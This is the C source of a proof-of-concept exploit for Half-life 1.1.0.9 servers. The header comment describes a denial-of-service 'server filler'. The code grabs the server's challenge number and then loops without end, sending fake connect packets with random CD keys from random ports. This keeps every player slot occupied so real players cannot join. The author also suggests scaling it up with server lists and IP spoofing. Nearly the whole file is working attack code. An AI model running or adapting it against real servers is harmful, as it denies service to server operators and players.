/*
Half-life 1.1.0.9 server filler (proof-of-concept)
	by Auriemma Luigi (mail: bugtest at sitoverde.com)

Linux version

This little utility fill the server with some fake players,
with the result that nobody can connect to the server because
it is full, but if the server's admin see the info about it,
he see that the maximum number of player is reached but
nobody is playing!!!
Each player is identified by a cdkey that can be used on the
same server 4 times at the same time (4 players that have
inserted the same cd-key at the installation of Half-life can
play in the same server, but not more of 4).
The utility first keep all the info of the server, then get
the challenge number (it change every time that Half-life run)
and use it for do the connection.
The strange thing is that the server give an unsigned int
challenge number, but the HL client change it in an int. (???)
After this we launch the loop for fill the server of players,
but when the maximum number is reached, it give us
"Server Full", so we must wait some seconds for the players
timeout (we don't play at Half-life, so the server disconnect
us for timeout) and we continue the loop.
I have used a TIMEWAIT of the half default time, because if a
real player leave the game before the 60 seconds (default
timeout), we fill also his place.

I think that this exploit can be used whit all the version
of Half-life, but I have not tested with other older version.
The protocol is a lot similar to QuakeIII's protocol, but
this last have the "connect" string crypted or compressed;
I have tried to copy the same Quake string dumped during a
connection establishment and send it with this utility but
it give me "No or bad challenge for address". The problem
is if someone can decrypt or decompress the string...

This is only a proof of concept for test the game, but with
an IP-list of some servers and with the IP spoofing, it can
be anonimized and a bit danger.

* This source is covered by the GNU GPL
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>

#define BUFFSIZE	2048
#define PORT	27015
#define INFO	"\xff\xff\xff\xffinfostring\n"
#define GET	"\xff\xff\xff\xffgetchallenge\n"
#define END	0x5c	//"\"
#define OFFSET	23
#define CHOFFSET	14	//Challenge offset "A00000000 "
#define MAXKEY	32	//size of the cdkey string sended
#define CONNECTSTRING	"\xff\xff\xff\xff" \
	"connect %d %s \"\\prot\\2\\unique\\-1\\raw\\%s\" \"\\model\\%s\\topcolor\\%d\\bottomcolor\\%d\\rate\\9999.000000\\cl_updaterate\\20\\cl_lw\\1\\cl_lc\\1\\cl_dlmax\\128\\hud_classautokill\\1\\name\\%s\"\n"
#define TIMEDELAY	200000	//200 ms
#define TIMEWAIT	30000000	//30 seconds (60 player timeout is default on Half-life servers,
				//but we use half time - some TIMEDELAY)
#define MODEL	"test"	//it's NOT important
//#define MODEL	"gordon"
//#define MODEL	"barney"
//#define MODEL	"gman"
//#define MODEL	"hgrunt"
//#define MODEL	"recon"
//#define MODEL	"robo"
//#define MODEL	"zombie"
//#define MODEL	"scientist"
//#define MODEL	"gina"
//#define MODEL	"helmet"

#define NAME	"test"
#define TOPCOLOR	128	//0-255, it's NOT important
#define BOTTOMCOLOR	128	//0-255, it's NOT important

void error_handle(int err);
char *get_token (char *buffer, char *token);

int main(int argc, char *argv[]) {
	setbuf(stdout, NULL);
	if(argc < 2) {
		printf("\nUsage: %s <host> [port(default %d)]\n", argv[0], PORT);
		exit(1);
	}

	unsigned char	buffsend[BUFFSIZE],
			buffrecv[BUFFSIZE],
			cdkey[MAXKEY + 1],
			challenge[16];
	struct	sockaddr_in 	peer,
				peerbind;
	struct	hostent *hp;
	int	shandle,
		err,
		recvlen,
		protocol,
		i;

	memset(buffsend, 0x00, BUFFSIZE);
	memset(buffrecv, 0x00, BUFFSIZE);
	memset(cdkey, 0x00, MAXKEY + 1);
	memset(challenge, 0x00, sizeof(challenge));

	if(inet_addr(argv[1]) == INADDR_NONE) {
                hp = gethostbyname(argv[1]);
		if(hp == 0) error_handle(-1);
                else peer.sin_addr = *(struct in_addr *)hp->h_addr;
        }
                else peer.sin_addr.s_addr = inet_addr(argv[1]);
	if(!argv[2]) peer.sin_port = htons(PORT);
		else peer.sin_port = htons(atoi(argv[2]));
	peer.sin_family = AF_INET;
	recvlen = sizeof(peer);
	peerbind.sin_addr.s_addr = INADDR_ANY;
	peerbind.sin_family      = AF_INET;

	//GET INFORMATIONS
	shandle = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
	error_handle(shandle);

	err = sendto(shandle, INFO, sizeof(INFO), 0, (struct sockaddr *)&peer, recvlen);
	error_handle(err);
	err = recvfrom(shandle, buffrecv, BUFFSIZE, 0, (struct sockaddr *)&peer, &recvlen);
	error_handle(err);
	close(shandle);

	protocol = atoi(get_token(buffrecv, "\\protocol\\"));
	
	printf("\n");
	printf("Address:            %s\n", get_token(buffrecv, "\\address\\"));
	printf("Hostname:           %s\n", get_token(buffrecv, "\\hostname\\"));
	printf("Description (game): %s\n", get_token(buffrecv, "\\description\\"));
	printf("Map name:           %s\n", get_token(buffrecv, "\\map\\"));
	printf("Protocol:           %d\n", protocol);
	printf("Players:            %s\n", get_token(buffrecv, "\\players\\"));
	printf("Max players:        %s\n", get_token(buffrecv, "\\max\\"));
	printf("Secure:             %s\n", get_token(buffrecv, "\\secure\\"));
	printf("Operating System:   %s\n", get_token(buffrecv, "\\os\\"));
	printf("Password protected: %s\n", get_token(buffrecv, "\\password\\"));
	printf("Type:               %s\n", get_token(buffrecv, "\\type\\"));
	printf("GameDirectory:      %s\n", get_token(buffrecv, "\\gamedir\\"));
	printf("Lan:                %s\n", get_token(buffrecv, "\\lan\\"));
	printf("Proxy Target:       %s\n", get_token(buffrecv, "\\proxytarget\\"));
	printf("cldll:              %s\n", get_token(buffrecv, "\\cldll\\"));
	printf("SVonly:             %s\n", get_token(buffrecv, "\\svonly\\"));
	printf("Mod Version:        %s\n", get_token(buffrecv, "\\modversion\\"));
	printf("Proxy Address:      %s\n", get_token(buffrecv, "\\proxyaddress\\"));
	printf("\n");

	//GET CHALLENGE NUMBER
	shandle = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
	error_handle(shandle);
	err = sendto(shandle, GET, sizeof(GET), 0, (struct sockaddr *)&peer, recvlen);
	error_handle(err);
	err = recvfrom(shandle, buffrecv, BUFFSIZE, 0, (struct sockaddr *)&peer, &recvlen);
	error_handle(err);
	strcpy(challenge, buffrecv + CHOFFSET);
	challenge[strlen(challenge) - 3] = 0x00;
	printf("Getchallenge: %s\n", challenge);
	close(shandle);

	//BEGIN ATTACK
	while(1) {
		for(i = 0; i < MAXKEY; i++) cdkey[i] = rand()%0x19+0x61;
			//a-z, but the cdkey can be alphadigit
		shandle = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
		error_handle(shandle);
		while(1) {
			peerbind.sin_port = htons(rand()%65535);
			err = bind(shandle, (struct sockaddr *)&peerbind, sizeof(peerbind));
			if(err < 0) continue;
				else break;
		}	//we find a random UDP port that is not binded

		sprintf(buffsend,
			CONNECTSTRING,
			protocol,
			challenge,
			cdkey,
			MODEL,
			TOPCOLOR,
			BOTTOMCOLOR,
			NAME);
		err = sendto(shandle, buffsend, strlen(buffsend), 0, (struct sockaddr *)&peer, recvlen);
		error_handle(err);
		err = recvfrom(shandle, buffrecv, BUFFSIZE, 0, (struct sockaddr *)&peer, &recvlen);
		error_handle(err);
		printf("Connect: %s\n", buffrecv);

		close(shandle);
		usleep(TIMEDELAY);

		if(strstr(buffrecv, "full")) usleep(TIMEWAIT);
		if(strstr(buffrecv, "challenge")) {
			shandle = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
			error_handle(shandle);
			err = sendto(shandle, GET, sizeof(GET), 0, (struct sockaddr *)&peer, recvlen);
			error_handle(err);
			err = recvfrom(shandle, buffrecv, BUFFSIZE, 0, (struct sockaddr *)&peer, &recvlen);
			error_handle(err);
		        strcpy(challenge, buffrecv + CHOFFSET);
		        challenge[strlen(challenge) - 3] = 0x00;
		        printf("Getchallenge: %s\n", challenge);
			close(shandle);
		}
	}

	return(0);
}

void error_handle(int err) {
	if(err < 0) {
		perror("\nError");
		exit(1);
	}
}

char *get_token (char *buffer, char *token) {
        char *stri, *strf;
	strf = strchr(buffer + OFFSET, 0x00);	// For read values that
	*strf = END;				// don't end with END
        if((stri = strstr(buffer + OFFSET, token))) {
                stri = stri + strlen(token);
                strf = strchr(stri, END);
                *strf = 0x00;
        }
                else return(NULL);
        return(stri);
}

